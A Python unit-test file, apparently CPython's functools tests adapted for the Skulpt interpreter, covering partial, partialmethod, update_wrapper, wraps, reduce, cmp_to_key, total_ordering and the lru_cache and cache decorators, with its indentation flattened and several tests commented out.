def test_manually_adding_non_string_keyword(self):
p = self.partial(capture)
# Adding a non-string/unicode keyword to partial kwargs
p.keywords[1234] = 'value'
r = repr(p)
self.assertIn('1234', r)
self.assertIn("'value'", r)
with self.assertRaises(TypeError):
p()
def test_keystr_replaces_value(self):
p = self.partial(capture)
class MutatesYourDict(object):
def __str__(self):
p.keywords[self] = ['sth2']
return 'astr'
# Replacing the value during key formatting should keep the original
# value alive (at least long enough).
p.keywords[MutatesYourDict()] = ['sth']
r = repr(p)
self.assertIn('astr', r)
self.assertIn("['sth']", r)
# class TestPartialPy(TestPartial, unittest.TestCase):
# partial = py_functools.partial
# class AllowPickle:
# def __init__(self):
# self._cm = replaced_module("functools", py_functools)
# def __enter__(self):
# return self._cm.__enter__()
# def __exit__(self, type, value, tb):
# return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
# class PyPartialSubclass(py_functools.partial):
# pass
# @unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# partial subclasses are not optimized for nested calls
test_nested_optimization = lambda *args: None
# class TestPartialPySubclass(TestPartialPy):
# partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
spec_keywords = functools.partialmethod(capture, self=1, func=2)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.a.spec_keywords(), ((self.a,), {'self': 1, 'func': 2}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
# with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod()
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod(func=capture, a=1)
def test_repr(self):
self.assertEqual(repr(self.A.__dict__['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
# def test_abstract(self):
# class Abstract(abc.ABCMeta):
# @abc.abstractmethod
# def add(self, x, y):
# pass
# add5 = functools.partialmethod(add, 5)
# self.assertTrue(Abstract.add.__isabstractmethod__)
# self.assertTrue(Abstract.add5.__isabstractmethod__)
# for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
# self.assertFalse(getattr(func, '__isabstractmethod__', False))
# def test_positional_only(self):
# def f(a, b, /):
# return a + b
# p = functools.partial(f, 1)
# self.assertEqual(p(2), f(1, 2))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
f.__doc__ = 'This is a test' # skulpt does not yet parse docstrings
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
# @unittest.skipIf(sys.flags.optimize >= 2,
# "Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
# @support.requires_docstrings
# @unittest.skipIf(sys.flags.optimize >= 2,
# "Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
f.__doc__ = "This is a test" # skulpt does not yet parse docstrings
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
# @unittest.skipIf(sys.flags.optimize >= 2,
# "Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
class TestReduce:
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.reduce(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.reduce(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.reduce(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.reduce(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.reduce(add, Squares(10)), 285)
self.assertEqual(self.reduce(add, Squares(10), 0), 285)
self.assertEqual(self.reduce(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.reduce)
self.assertRaises(TypeError, self.reduce, 42, 42)
self.assertRaises(TypeError, self.reduce, 42, 42, 42)
self.assertEqual(self.reduce(42, "1"), "1") # func is never called with one item
self.assertEqual(self.reduce(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.reduce, 42, (42, 42))
self.assertRaises(TypeError, self.reduce, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.reduce, add, "")
self.assertRaises(TypeError, self.reduce, add, ())
self.assertRaises(TypeError, self.reduce, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.reduce, add, TestFailingIter())
self.assertEqual(self.reduce(add, [], None), None)
self.assertEqual(self.reduce(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.reduce, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.reduce(add, SequenceClass(5)), 10)
self.assertEqual(self.reduce(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.reduce, add, SequenceClass(0))
self.assertEqual(self.reduce(add, SequenceClass(0), 42), 42)
self.assertEqual(self.reduce(add, SequenceClass(1)), 0)
self.assertEqual(self.reduce(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.reduce(add, d), "".join(d.keys()))
# @unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduceC(TestReduce, unittest.TestCase):
if c_functools:
reduce = c_functools.reduce
# class TestReducePy(TestReduce, unittest.TestCase):
# reduce = staticmethod(py_functools.reduce)
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
# self.assertNotIsInstance(k, collections.abc.Hashable)
# @unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
# class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
# cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
# with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
# with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
# def test_pickle(self):
# for proto in range(pickle.HIGHEST_PROTOCOL + 1):
# for name in '__lt__', '__gt__', '__le__', '__ge__':
# with self.subTest(method=name, proto=proto):
# method = getattr(Orderable_LT, name)
# method_copy = pickle.loads(pickle.dumps(method, proto))
# self.assertIs(method_copy, method)
# @functools.total_ordering
# class Orderable_LT:
# def __init__(self, value):
# self.value = value
# def __lt__(self, other):
# return self.value < other.value
# def __eq__(self, other):
# return self.value == other.value
def ignore_skulpt(f):
@functools.wraps(f)
def wrapper(self, *args, **kws):
if (self.verbosity > 1):
print(f.__name__, 'was ignored by skulpt')
return wrapper
class TestCache:
# This tests that the pass-through is working as designed.
# The underlying functionality is tested in TestLRU.
def test_cache(self):
@self.module.cache
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
global f_cnt
@self.module.lru_cache(0)
def f():
global f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
global f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
global f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_no_args(self):
@self.module.lru_cache
def square(x):
return x ** 2
self.assertEqual(list(map(square, [10, 20, 10])),
[100, 400, 100])
self.assertEqual(square.cache_info().hits, 1)
self.assertEqual(square.cache_info().misses, 2)
self.assertEqual(square.cache_info().maxsize, 128)
self.assertEqual(square.cache_info().currsize, 2)
def test_lru_bug_35780(self):
# C version of the lru_cache was not checking to see if
# the user function call has already modified the cache
# (this arises in recursive calls and in multi-threading).
# This cause the cache to have orphan links not referenced
# by the cache dictionary.
global once
once = True # Modified by f(x) below
@self.module.lru_cache(maxsize=10)
def f(x):
global once
rv = f'.{x}.'
if x == 20 and once:
once = False
rv = f(x)
return rv
# Fill the cache
for x in range(15):
self.assertEqual(f(x), f'.{x}.')
self.assertEqual(f.cache_info().currsize, 10)
# Make a recursive call and make sure the cache remains full
self.assertEqual(f(20), '.20.')
self.assertEqual(f.cache_info().currsize, 10)
def test_lru_bug_36650(self):
# C version of lru_cache was treating a call with an empty **kwargs
# dictionary as being distinct from a call with no keywords at all.
# This did not result in an incorrect answer, but it did trigger
# an unexpected cache miss.
@self.module.lru_cache()
def f(x):
pass
f(0)
f(0, **{})
self.assertEqual(f.cache_info().hits, 1)
@ignore_skulpt
def test_lru_hash_only_once(self):
# To protect against weird reentrancy bugs and to improve
# efficiency when faced with slow __hash__ methods, the
# LRU cache guarantees that it will only call __hash__
# only once per use as an argument to the cached function.
@self.module.lru_cache(maxsize=1)
def f(x, y):
return x * 3 + y
# Simulate the integer 5
mock_int = unittest.mock.Mock()
mock_int.__mul__ = unittest.mock.Mock(return_value=15)
mock_int.__hash__ = unittest.mock.Mock(return_value=999)
# Add to cache: One use as an argument gives one call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 1)
self.assertEqual(f.cache_info(), (0, 1, 1, 1))
# Cache hit: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 1, 1, 1))
# Cache eviction: No use as an argument gives no additional call
self.assertEqual(f(6, 2), 20)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 2, 1, 1))
# Cache miss: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 3)
self.assertEqual(f.cache_info(), (1, 3, 1, 1))
def test_lru_reentrancy_with_len(self):
# Test to make sure the LRU cache code isn't thrown-off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
global len
old_len = len
try:
len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
len = old_len
def test_lru_star_arg_handling(self):
# Test regression that arose in ea064ff3c10f
@functools.lru_cache()
def f(*args):
return args
self.assertEqual(f(1, 2), (1, 2))
self.assertEqual(f((1, 2)), ((1, 2),))
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=0, currsize=0))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
# self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
